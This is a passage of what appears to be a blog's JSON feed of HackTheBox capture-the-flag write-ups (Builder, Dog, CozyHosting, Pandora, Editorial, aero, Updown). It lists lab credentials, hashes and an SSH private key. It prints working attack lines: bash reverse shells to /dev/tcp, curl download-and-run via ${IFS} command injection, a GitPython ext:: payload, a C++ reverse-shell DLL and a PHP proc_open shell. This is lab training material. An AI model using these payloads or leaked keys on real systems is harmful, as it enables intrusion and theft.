iRR2X249+9lTU5Ppm8BvnNHAQ31Pzx178G3IO+ziC2DfTcT++SAUS/VR9T3TnBeMQFsv9GKlYjvgKTd6Rx+oX+D2sN1WKWHLp85g6DsufByTC3o/OZGSnjUmDpMAs6wg0Z3bYcxzrTcj9pnR3jcywwPCGkjpS03ZmEDtuU0XUthrs7EZzqCxELqf9aQWbpUswN8nVLPzqAGbBMQQJHPmS4FSjHXvgFHNtWjeg0yRgf7cVaD0aQXDzTZeWm3dcLomYJe2xfrKNLkbA/t3le35+bHOSe/p7PrbvOv/jlxBenvQY+2GGoCHs7SWOoaYjGNd7QXUomZxK6l7vmwGoJi+R/D+ujAB1/5JcrH8fI0mP8Z+ZoJrziMF2bhpR1vcOSiDq0+Bpk7yb8AIikCDOW5XlXqnX7C+I6mNOnyGtuanEhiJSFVqQ3R+MrGbMwRzzQmtfQ5G34m67Gvzl1IQMHyQvwFeFtx4GHRlmlQGBXEGLz6H1Vi5jPuM2AVNMCNCak45l/9PltdJrz+Uq/d+LXcnYfKagEN39ekTPpkQrCV+P0S65y4l1VFE1mX45CR4QvxalZA4qjJqTnZP4s/YD1Ix+XfcJDpKpksvCnN5/ubVJzBKLEHSOoKwiyNHEwdkD9j8Dg9y88G8xrc7jr+ZcZtHSJRlK1o+VaeNOSeQut3iZjmpy0Ko1ZiC8gFsVJg8nWLCat10cp+xTy+fJ1VyIMHxUWrZu+duVApFYpl6ji8A4bUxkroMMgyPdQU8rjJwhMGEP7TcWQ4Uw2s6xoQ7nRGOUuLH4QflOqzC6ref7n33gsz18XASxjBg6eUIw9Z9s5lZyDH1SZO4jI25B+GgZjbe7UYoAX13MnVMstYKOxKnaig2Rnbl9NsGgnVuTDlAgSO2pclPnxj1gCBS+bsxewgm6cNR18/ZT4ZT+YT1+uk5Q3O4tBF6z/M67mRdQqQqWRfgA5x0AEJvAEb2dftvR98ho8cRMVw/0S3T60reiB/OoYrt/IhWOcvIoo4M92eo5CduZnajt4onOCTC13kMqTwdqC36cDxuX5aDD0Ee92ODaaLxTfZ1Id4ukCrscaoOZtCMxncK9uv06kWpYZPMUasVQLEdDW+DixC2EnXT56IELG5xj3/1nqnieMhavTt5yipvfNJfbFMqjHjHBlDY/MCkU89l6p/xk6JMH+9SWaFlTkjwshZDA/oO/E9Pump5GkqMIw3V/7O1fRO/dR/Rq3RdCtmdb3bWQKIxdYSBlXgBLnVC7O90Tf12P0+DMQ1UrT7PcGF22dqAe6VfTH8wFqmDqidhEdKiZYIFfOhe9+u3O0XPZldMzaSLjj8ZZy5hGCPaRS613b7MZ8JjqaFGWZUzurecXUiXiUg0M9/1WyECyRq6FcfZtza+q5t94IPnyPTqmUYTmZ9wZgmhoxUjWm2AenjkkRDzIEhzyXRiX4/vD0QTWfYFryunYPSrGzIp3FhIOcxqmlJQ2SgsgTStzFZz47Yj/ZV61DMdr95eCo+bkfdijnBa5SsGRUdjafeU5hqZM1vTxRLU1G7Rr/yxmmA5mAHGeIXHTWRHYSWn9gonoSBFAAXvj0bZjTeNBAmU8eh6RI6pdapVLeQ0tEiwOu4vB/7mgxJrVfFWbN6w8AMrJBdrFzjENnvcq0qmmNugMAIict6hK48438fb+BX+E3y8YUN+LnbLsoxTRVFH/NFpuaw+iZvUPm0hDfdxD9JIL6FFpaodsmlksTPz366bcOcNONXSxuD0fJ5+WVvReTFdi+agF+sF2jkOhGTjc7pGAg2zl10O84PzXW1TkN2yD9YHgo9xYa8E2k6pYSpVxxYlRogfz9exupYVievBPkQnKo1Qoi15+eunzHKrxm3WQssFMcYCdYHlJtWCbgrKChsFys4oUE7iW0YQ0MsAdcg/hWuBX878aR+/3HsHaB1OTIcTxtaaMR8IMMaKSM=} lets use this to decrypt\nprintln( hudson.util.Secret.decrypt(\u0026#34;${ENCRYPTED_PASSPHRASE_OR_PASSWORD}\u0026#34;) ) println( hudson.util.Secret.decrypt(\u0026#34;{AQAAABAAAAowLrfCrZx9baWliwrtCiwCyztaYVoYdkPrn5qEEYDqj5frZLuo4qcqH61hjEUdZtkPiX6buY1J4YKYFziwyFA1wH/X5XHjUb8lUYkf/XSuDhR5tIpVWwkk7l1FTYwQQl/i5MOTww3b1QNzIAIv41KLKDgsq4WUAS5RBt4OZ7v410VZgdVDDciihmdDmqdsiGUOFubePU9a4tQoED2uUHAWbPlduIXaAfDs77evLh98/INI8o/A+rlX6ehT0K40cD3NBEF/4Adl6BOQ/NSWquI5xTmmEBi3NqpWWttJl1q9soOzFV0C4mhQiGIYr8TPDbpdRfsgjGNKTzIpjPPmRr+j5ym5noOP/LVw09+AoEYvzrVKlN7MWYOoUSqD+C9iXGxTgxSLWdIeCALzz9GHuN7a1tYIClFHT1WQpa42EqfqcoB12dkP74EQ8JL4RrxgjgEVeD4stcmtUOFqXU/gezb/oh0Rko9tumajwLpQrLxbAycC6xgOuk/leKf1gkDOEmraO7uiy2QBIihQbMKt5Ls+l+FLlqlcY4lPD+3Qwki5UfNHxQckFVWJQA0zfGvkRpyew2K6OSoLjpnSrwUWCx/hMGtvvoHApudWsGz4esi3kfkJ+I/j4MbLCakYjfDRLVtrHXgzWkZG/Ao+7qFdcQbimVgROrncCwy1dwU5wtUEeyTlFRbjxXtIwrYIx94+0thX8n74WI1HO/3rix6a4FcUROyjRE9m//dGnigKtdFdIjqkGkK0PNCFpcgw9KcafUyLe4lXksAjf/MU4v1yqbhX0Fl4Q3u2IWTKl+xv2FUUmXxOEzAQ2KtXvcyQLA9BXmqC0VWKNpqw1GAfQWKPen8g/zYT7TFA9kpYlAzjsf6Lrk4Cflaa9xR7l4pSgvBJYOeuQ8x2Xfh+AitJ6AMO7K8o36iwQVZ8+p/I7IGPDQHHMZvobRBZ92QGPcq0BDqUpPQqmRMZc3wN63vCMxzABeqqg9QO2J6jqlKUgpuzHD27L9REOfYbsi/uM3ELI7NdO90DmrBNp2y0AmOBxOc9e9OrOoc+Tx2K0JlEPIJSCBBOm0kMr5H4EXQsu9CvTSb/Gd3xmrk+rCFJx3UJ6yzjcmAHBNIolWvSxSi7wZrQl4OWuxagsG10YbxHzjqgoKTaOVSv0mtiiltO/NSOrucozJFUCp7p8v73ywR6tTuR6kmyTGjhKqAKoybMWq4geDOM/6nMTJP1Z9mA+778Wgc7EYpwJQlmKnrk0bfO8rEdhrrJoJ7a4No2FDridFt68HNqAATBnoZrlCzELhvCicvLgNur+ZhjEqDnsIW94bL5hRWANdV4YzBtFxCW29LJ6/LtTSw9LE2to3i1sexiLP8y9FxamoWPWRDxgn9lv9ktcoMhmA72icQAFfWNSpieB8Y7TQOYBhcxpS2M3mRJtzUbe4Wx+MjrJLbZSsf/Z1bxETbd4dh4ub7QWNcVxLZWPvTGix+JClnn/oiMeFHOFazmYLjJG6pTUstU6PJXu3t4Yktg8Z6tk8ev9QVoPNq/XmZY2h5MgCoc/T0D6iRR2X249+9lTU5Ppm8BvnNHAQ31Pzx178G3IO+ziC2DfTcT++SAUS/VR9T3TnBeMQFsv9GKlYjvgKTd6Rx+oX+D2sN1WKWHLp85g6DsufByTC3o/OZGSnjUmDpMAs6wg0Z3bYcxzrTcj9pnR3jcywwPCGkjpS03ZmEDtuU0XUthrs7EZzqCxELqf9aQWbpUswN8nVLPzqAGbBMQQJHPmS4FSjHXvgFHNtWjeg0yRgf7cVaD0aQXDzTZeWm3dcLomYJe2xfrKNLkbA/t3le35+bHOSe/p7PrbvOv/jlxBenvQY+2GGoCHs7SWOoaYjGNd7QXUomZxK6l7vmwGoJi+R/D+ujAB1/5JcrH8fI0mP8Z+ZoJrziMF2bhpR1vcOSiDq0+Bpk7yb8AIikCDOW5XlXqnX7C+I6mNOnyGtuanEhiJSFVqQ3R+MrGbMwRzzQmtfQ5G34m67Gvzl1IQMHyQvwFeFtx4GHRlmlQGBXEGLz6H1Vi5jPuM2AVNMCNCak45l/9PltdJrz+Uq/d+LXcnYfKagEN39ekTPpkQrCV+P0S65y4l1VFE1mX45CR4QvxalZA4qjJqTnZP4s/YD1Ix+XfcJDpKpksvCnN5/ubVJzBKLEHSOoKwiyNHEwdkD9j8Dg9y88G8xrc7jr+ZcZtHSJRlK1o+VaeNOSeQut3iZjmpy0Ko1ZiC8gFsVJg8nWLCat10cp+xTy+fJ1VyIMHxUWrZu+duVApFYpl6ji8A4bUxkroMMgyPdQU8rjJwhMGEP7TcWQ4Uw2s6xoQ7nRGOUuLH4QflOqzC6ref7n33gsz18XASxjBg6eUIw9Z9s5lZyDH1SZO4jI25B+GgZjbe7UYoAX13MnVMstYKOxKnaig2Rnbl9NsGgnVuTDlAgSO2pclPnxj1gCBS+bsxewgm6cNR18/ZT4ZT+YT1+uk5Q3O4tBF6z/M67mRdQqQqWRfgA5x0AEJvAEb2dftvR98ho8cRMVw/0S3T60reiB/OoYrt/IhWOcvIoo4M92eo5CduZnajt4onOCTC13kMqTwdqC36cDxuX5aDD0Ee92ODaaLxTfZ1Id4ukCrscaoOZtCMxncK9uv06kWpYZPMUasVQLEdDW+DixC2EnXT56IELG5xj3/1nqnieMhavTt5yipvfNJfbFMqjHjHBlDY/MCkU89l6p/xk6JMH+9SWaFlTkjwshZDA/oO/E9Pump5GkqMIw3V/7O1fRO/dR/Rq3RdCtmdb3bWQKIxdYSBlXgBLnVC7O90Tf12P0+DMQ1UrT7PcGF22dqAe6VfTH8wFqmDqidhEdKiZYIFfOhe9+u3O0XPZldMzaSLjj8ZZy5hGCPaRS613b7MZ8JjqaFGWZUzurecXUiXiUg0M9/1WyECyRq6FcfZtza+q5t94IPnyPTqmUYTmZ9wZgmhoxUjWm2AenjkkRDzIEhzyXRiX4/vD0QTWfYFryunYPSrGzIp3FhIOcxqmlJQ2SgsgTStzFZz47Yj/ZV61DMdr95eCo+bkfdijnBa5SsGRUdjafeU5hqZM1vTxRLU1G7Rr/yxmmA5mAHGeIXHTWRHYSWn9gonoSBFAAXvj0bZjTeNBAmU8eh6RI6pdapVLeQ0tEiwOu4vB/7mgxJrVfFWbN6w8AMrJBdrFzjENnvcq0qmmNugMAIict6hK48438fb+BX+E3y8YUN+LnbLsoxTRVFH/NFpuaw+iZvUPm0hDfdxD9JIL6FFpaodsmlksTPz366bcOcNONXSxuD0fJ5+WVvReTFdi+agF+sF2jkOhGTjc7pGAg2zl10O84PzXW1TkN2yD9YHgo9xYa8E2k6pYSpVxxYlRogfz9exupYVievBPkQnKo1Qoi15+eunzHKrxm3WQssFMcYCdYHlJtWCbgrKChsFys4oUE7iW0YQ0MsAdcg/hWuBX878aR+/3HsHaB1OTIcTxtaaMR8IMMaKSM=}\u0026#34;) ) boom we have this\n-----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY----- lets use this and ssh as root\njust like that we have our flag\n","date":"20 February 2026","externalUrl":null,"permalink":"/ctf-writeups/builder/","section":"CTF Writeups","summary":"","title":"Builder","type":"ctf-writeups"},{"content":" Dog # Overview # OS: Linux IP: 10.129.5.109 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got access via exposed creds on git, then used an authenticated rce to get access, switched users and ran binary bee as sudo to get sudo perms.\nLoot # Takeaways Category Details Usernames+Passwords dogBackDropSystem Anonymous tiffany:BackDropJ2024DS2024 jobert:BackDropJ2024DS2024 | | Hashes | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v |\nEnumeration # nmap HUGE\ndirb sub 80 hmm so when we used this cred we were getting unknown pass\nlet me have hydra running in the background doing this\nnow lets check\n/core\n/README.md\nwith this i can tell that it is backdrop version 1.22.0 maybe\nfound this RCE path, but need admin privs\nhttps://grimthereaperteam.medium.com/backdrop-cms-1-22-0-unrestricted-file-upload-layouts-ce49a6b7e521 kali ( found out it is actually 1.27.1 instead by looking at the testing folder lol )\ni think the robotstxt was a loophole, so im gonna check the git repo now\nlet me dump it\nlooking at the settings we find this\nwe also find the user tiffany\nExploitation # i had to use a writeup to find out how to locate tiffany, but lets try using hydra nd brutefrorcing the username w the pass we found\nBackDropJ2024DS2024\nlets move on w tiffany fr now\nlets follow this cve for RCE now\nBackdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)\nwasnt working so we tried this github one instead\nhttps://github.com/rvizx/backdrop-rce/blob/main/README.md\nthere is an ssh folder in jobert, lets take that\ndamn we cant take it we gotta find another way\nso there is apparently mysql open on this\nlets access it after pivoting\nboom we have access with the root creds\napparerently, this is not the intended path and cracking the hashes will take too much time\ninstead we can ssh with jobert as the user and the same pass from before\nnow we can apparently run bee as sudo so lets check it out\nsudo /usr/local/bin/bee eval ‘system(”bash”);’\n","date":"20 February 2026","externalUrl":null,"permalink":"/ctf-writeups/dog/","section":"CTF Writeups","summary":"","title":"Dog","type":"ctf-writeups"},{"content":" CozyHosting # Overview # OS: Linux IP: 10.129.229.88 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # found exposed endpoint that gave us a session, used session and got in with RCE that bypassed whitespacefiltering, found jar file with archive containing db creds, used db creds to find hashes, cracked hash for ssh cred, found sudo -l lets us run binary shsh with root, elevarted with proxychain command.\nLoot # Takeaways Category Details Usernames+Passwords info@cozyhosting.htb postgres:Vg\u0026amp;nvzAQ7XxR josh@cozyhosting.htb | | Hashes | kanderson $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim\nadmin $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | | Sessions | kanderson:B1FB7155CC956000B44F256C81194FAA |\nEnumeration # nmap dirb sub nothing interestin w wfuzz\n80 South Jakarta City 12120, Jakarta, Indonesia Phone: +62 5589 55488 55\nEmail: info@cozyhosting.htb\n/admin\nbecause of this whitelabel thing we identified that the framework being using is springboot, lets fuzz for more endpoints\nExploitation # On visiting this exposed endpoint we find this user kandersons session\nkanderson\nB1FB7155CC956000B44F256C81194FAA\nlets edit our browsers cookies\nwe should be able to access now\nthere is this place where we can use ssh\nsince my connection keeps breaking ill refer to 0xdfs blog\nLets host our revshell locally\n#!/bin/bash bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.6/443 0\u0026gt;\u0026amp;1 now lets use user as localhost\nand username as\nmuqf%3bcurl${IFS}http: // 10 . 10 . 14 . 41/ rev . sh${IFS}-o${IFS}/tmp/rev.sh now lets send another request to run it\nmuq%3bbash${IFS}/tmp/rev.sh and Boom we have a shell\nfound this in the jar file located withing /app directory because i noticed earlier in the env dir it was referencing to this\nwe have the creds for postgres and we know that it is running on this port\nlets portforward the port 5432 and access the postgresDB\nwe see these two tables in the cozyhosting db\nlets try a different mode\nand the password for admin is\nmanchesterunited\nwe find that when we ssh w user as john it works so lets pop a shell\ndamn so we can run the ssh binary?\ngtfo bins gives us this proxy thing that instantly drops root\n","date":"19 February 2026","externalUrl":null,"permalink":"/ctf-writeups/cozyhosting/","section":"CTF Writeups","summary":"","title":"CozyHosting","type":"ctf-writeups"},{"content":" Pandora # Overview # OS: Linux Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # snmpwalk for creds, escalated with hidden site and known explot.\nLoot # Takeaways Category Details Usernames+Passwords daniel:HotelBabylon23 Hashes Enumeration # nmap 80 161 Exploitation # we ssh into the server with these creds as daniel, lets try privesc with linpeas and see if there is anything interesting.\ninteresting we can try this\nnevermind it says starting from 1.9.14 so we can move on\nthere seems to be no file so this cant be it either\nlets check our linepas result again\ninteresting, mysql is running?\nmysql is definetely running\nhmm lets check the pandora.conf file out\nthere seems to be somethign running locally?\nlets check the sites conf file if there is anything we missed\nthere is a site that is being hosted locally with the name pandora.panda.htb and its under matt, this is interesting lets add it to our hosts file and do some port forwarding\non portforwarding the traffic we get this\nBOOM now lets enumerate\non searching this version number we get this\nAuthenticated RCE\nPandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)\nthere is also this\nblog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained\nused a aunauthenticated sql exploit to get access as matt\nPandora_v7.0NG.742_exploit_unauthenticated/sqlpwn.py at master · shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated\nReading the config file gives us those credentials\nfound a MD5 hash on one of the tables, for matt\nlets crack it aand it doesnt work\nwait why do even have to do that in the first place, we can just use the cmdline we got from earlier to execute with python3 a revshell\nannnd we have our shell as matt\nwe know that tar is being invoke w root, so lets modify it nd use our tar as the path to it is not absolute\nmatt@pandora:/tmp$ touch tar matt@pandora:/tmp$ echo \u0026#34;/bin/sh\u0026#34; \u0026gt; tar matt@pandora:/tmp$ chmod +x tar matt@pandora:/tmp$ PATH=/tmp:$PATH matt@pandora:/tmp$ pandora_backup PandoraFMS Backup Utility Now attempting to backup PandoraFMS client $ whoami matt this doesn’t work, i gave up nw and looked at 0xdfs writeup who explained why this didnt work, apparently it works if we ssh as matt and run it again so lets try that\n","date":"9 February 2026","externalUrl":null,"permalink":"/ctf-writeups/pandora/","section":"CTF Writeups","summary":"","title":"Pandora","type":"ctf-writeups"},{"content":" Editorial # Overview # OS: Linux IP: 10.129.3.78 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Found site that acceps url parameter, fuzzed it for SSRF on http://localhost, found file at port 5000, enumerated api end points at port 5000 to find the creds for inital access, elevatred priv by identifying a vulnerable python git package in code that prod could run, also learnt how to enumerate .git.\nLoot # Takeaways Category Details Usernames+Passwords Username: dev Password: dev080217_devAPI!@\ndev-carlos.valderamma | | Hashes | |\nEnumeration # nmap 80\ndirbusting\nExploitation # we notice that on visiting the site we have a book upload option where on clciking preview we are returned with the directory of the place the image is being saved in\nCould not find anything so lets start enumerating for any other port that might be open on the local host\nLets automate this process with burpsuite intruder\nburpsuite was very slow so what we did instead was we used FFUF to perform the scan and found port 5000 having a different size, on visiting that port we were able to grab a file that had this as it content.\nnow on querying all these endpoints\nwe got these credentials\nnow that we r in using ssh, we come across this git repo\nthere is a file here called app.py\nlets visit this app.py\nnothin much over here\ndev@editorial:/opt/apps/app_editorial$ls app.py editorial.sock __pycache__ static templates venv wsgi.py when checking the logs we come across this which is pretty interesting\ndowngrading prod do dev?\nlets look a bit more deeper\nand boom we have credentials for prod\nwe are able to run this script as root\nok so we can see that the script is pulling from the git library, lets check if that has any vulns\nhttps://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858\nwe find this RCE we can use\nlets run the python script with this\n“exit::sh -c bash% -c% ‘bash% -i % \u0026gt;\u0026amp;% /dev/tcp/10.10.14.54/7823% 0\u0026gt;\u0026amp;1”\nlets store the script instead and run it since doing it directly doesnt work\nsudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py \u0026rsquo;ext::sh -c bash% /tmp/shell.sh’\nand that gives us our root flag\n0a68777caa922bdfb77f7d148663cced\n","date":"28 January 2026","externalUrl":null,"permalink":"/ctf-writeups/editorial/","section":"CTF Writeups","summary":"","title":"Editorial","type":"ctf-writeups"},{"content":" aero # Overview # OS: Windows IP: 10.129.1.73 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got initial access using a exploit.theme file, elevated privs with buffer overflow privesc vuln.\nLoot # Takeaways Category Details Usernames+Passwords Hashes Enumeration # nmap 80 Place where we can upload a .theme file\nExploitation # Knowing that we are able to upload theme files lets check if there is any vulnerability that works with this\nthis looks interesting, lets try it out\nLets use visual studio to craft our rev shell in C\nLets add a new header file in the solution explorer, named rev.h\n`#pragma once\nextern \u0026ldquo;C\u0026rdquo; __declspec(dllexport) int VerifyThemeVersion(void);`\nlets add rev.cpp aswell\n#include \u0026#34;pch.h\u0026#34; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026lt;process.h\u0026gt; #include \u0026lt;winsock2.h\u0026gt; #include \u0026lt;ws2tcpip.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #pragma comment(lib, \u0026#34;Ws2_32.lib\u0026#34;) #include \u0026#34;rev.h\u0026#34; using namespace std; void rev_shell() { FreeConsole(); const char* REMOTE_ADDR = \u0026#34;127.0.0.1\u0026#34;; const char* REMOTE_PORT = \u0026#34;4444\u0026#34;; WSADATA wsaData; int iResult = WSAStartup(MAKEWORD(2, 2), \u0026amp;wsaData); struct addrinfo* result = NULL, * ptr = NULL, hints; memset(\u0026amp;hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; getaddrinfo(REMOTE_ADDR, REMOTE_PORT, \u0026amp;hints, \u0026amp;result); ptr = result; SOCKET ConnectSocket = WSASocket(ptr-\u0026gt;ai_family, ptr-\u0026gt;ai_socktype, ptr-\u0026gt;ai_protocol, NULL, NULL, NULL); connect(ConnectSocket, ptr-\u0026gt;ai_addr, (int)ptr-\u0026gt;ai_addrlen); STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(\u0026amp;si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(\u0026amp;pi, sizeof(pi)); si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; si.hStdInput = (HANDLE)ConnectSocket; si.hStdOutput = (HANDLE)ConnectSocket; si.hStdError = (HANDLE)ConnectSocket; TCHAR cmd[] = TEXT(\u0026#34;C:\\\\WINDOWS\\\\SYSTEM32\\\\CMD.EXE\u0026#34;); CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, \u0026amp;si, \u0026amp;pi); WaitForSingleObject(pi.hProcess, INFINITE); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); WSACleanup(); } int VerifyThemeVersion(void) { rev_shell(); return 0; now lets set it to release and go build and then build wsolution\nafter copying it over to stage 3 we will generate over theme file\n.\\ThemeBleed.exe make_theme 10.10.14.6 exploit.theme\nOk so scratch all that, despite trying several times i wasnt able to run the exploit, maybe because it is meant for windows, so lets try this guys instead.\nhttps://github.com/Jnnshschl/CVE-2023-38146\nand we get our rev shell on the listener so easily with this\nwe find some cve pdf lets use this to encode and decode it\n[convert]::ToBase64String((Get-Content -path \u0026ldquo;filename\u0026rdquo; -Encoding byte))\n[System.IO.File]::WriteAllBytes(\u0026ldquo;C:\\Users..\\Desktop\\abcd.pdf\u0026rdquo; , [System.Convert]::FromBase64String(\u0026ldquo;Base64 encoded string\u0026rdquo;))\nFound a precompiled binary of this exploit online, generated revshell.exe w msfvenom and then just ran it to get the rev shell\n","date":"26 January 2026","externalUrl":null,"permalink":"/ctf-writeups/aero/","section":"CTF Writeups","summary":"","title":"aero","type":"ctf-writeups"},{"content":" Updown # Overview # OS: Linux IP: 10.129.37.232 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got access via discovered subdomain which we accessed by modifying a header and then we uploaded a phar file access phar file content to get our rev shell, esclated priv by python2 input func rce which gave us access to developer, grabbed rsa key ssh in and ppriv esc again by using a script from gtfo bin for easy install that we had sudo perms to.\nLoot # Takeaways Username +Passwords Enumeration # nmap 80 Homepage on 80\nDebug just gives us the pages source code hmmm\n/dev shows nothing\nWe find this subdomain called dev\nusing gobuster on dev we get these\ngobuster dir -u http://siteisup.htb/dev -w /usr/share/wordlists/dirb/common.txt\nVulnerabilities # Exploitation # we find that we can access the dev subdomain with a special header by klooking at .htaccess which we got from dumping git with gitdumper ( dev/.git/ ) so lets check it out\nfunc blacklist\n\u0026lt;?php $descriptorspec = [ 0 =\u0026gt; [\u0026#34;pipe\u0026#34;, \u0026#34;r\u0026#34;], // STDIN 1 =\u0026gt; [\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;], // STDOUT 2 =\u0026gt; [\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;], // STDERR ]; $command = \u0026#34;/bin/bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.15/1234 0\u0026gt;\u0026amp;1\u0026#39;\u0026#34;; $process = proc_open($command, $descriptorspec, $pipes); if (is_resource($process)) { fclose($pipes[0]); // Close STDIN fclose($pipes[1]); // Close STDOUT fclose($pipes[2]); // Close STDERR proc_close($process); } ?\u0026gt; php rev shell without fsockopen() and exec() )\n\u0026lt;?php $descspec = array( 0 